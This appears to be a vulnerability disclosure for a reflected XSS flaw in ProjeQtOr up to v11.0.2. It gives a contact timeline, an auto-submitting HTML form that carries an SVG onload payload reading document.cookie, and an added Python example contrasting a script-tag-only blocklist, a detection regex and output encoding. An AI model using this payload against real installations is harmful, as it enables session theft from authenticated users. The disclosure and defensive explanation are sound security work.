A reflected XSS vulnerability via a POST request to /tool/ack.php affecting all ProjeQtOr versions up to v11.0.2 (unpatched)
It was possible to bypass the very basic and incomplete security measure (detection of the <script> tag only) implemented in the checkValidHtmlText() function of the application's /model/Security.php file.
- 30-10-2023: Vulnerability identified during a client pentest
- 07-11-2023: 1st vendor contact attempt via website form
- 17-11-2023: CVE requested
- 19-11-2023: 2nd vendor contact attempt via email
- 24-11-2023: CVE assigned
- 10-01-2024: 3rd vendor contact attempt via support forum
- 06-02-2024: Public disclosure requested
Create an HTML file with the following auto-submitting form:
<html>
<body>
<form action="https://demo.projeqtor.org/tool/ack.php" method="POST">
<input type="hidden" name="resultAck" value="<svg/onload=alert(document.cookie)>" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Opening the file in an authenticated browser session sends the POST request, which injects and executes the PoC JavaScript code (displaying the cookies in an alert).
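To illustrate why a <script>-only check is insufficient and what the fix looks like, here is an added example (not code from ProjeQtOr): a hypothetical re-implementation of a blocklist check in the spirit of the one described above, a detection helper that flags event-handler and javascript: vectors for logging, and contextual output encoding applied to the advisory's payload.

```python
import html
import re

# Payload taken from the advisory's PoC (value of the resultAck field).
POC_PAYLOAD = "<svg/onload=alert(document.cookie)>"


def naive_script_tag_check(text: str) -> bool:
    """Hypothetical blocklist modelled on the behaviour the advisory describes.
    It is NOT the project's checkValidHtmlText(). Returns True when the text
    is judged 'safe', i.e. when no <script tag is present."""
    return re.search(r"<\s*script", text, re.IGNORECASE) is None


# A tag carrying an on* event-handler attribute, or a javascript: URL.
EVENT_HANDLER_RE = re.compile(r"<[^>]*\bon\w+\s*=", re.IGNORECASE)
JS_URI_RE = re.compile(r"javascript\s*:", re.IGNORECASE)


def flags_inline_script_vector(text: str) -> bool:
    """Detection helper for request logging / alerting: True when the input
    carries an inline-script vector that a <script>-only check misses.
    This is for visibility, not the sole defence."""
    return bool(EVENT_HANDLER_RE.search(text) or JS_URI_RE.search(text))


def render_safely(text: str) -> str:
    """The actual fix: contextual output encoding. '<', '>', '&' and quotes
    become entities, so the browser parses the value as text, never markup."""
    return html.escape(text, quote=True)


def is_inert_markup(rendered: str) -> bool:
    """After encoding, no '<' or '>' may survive: nothing can open a tag."""
    return "<" not in rendered and ">" not in rendered


if __name__ == "__main__":
    # Blocklist passes the payload, detection flags it, encoding neutralises it.
    print("naive check says safe:", naive_script_tag_check(POC_PAYLOAD))
    print("detection flags it:   ", flags_inline_script_vector(POC_PAYLOAD))
    print("encoded output:       ", render_safely(POC_PAYLOAD))
```

Run as a script to see that the blocklist accepts the payload while the encoded form contains no tag delimiters at all.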
Vulnerability type: Cross Site Scripting (XSS)
Product: ProjeQtOr
Affected files: /tool/ack.php, /model/Security.php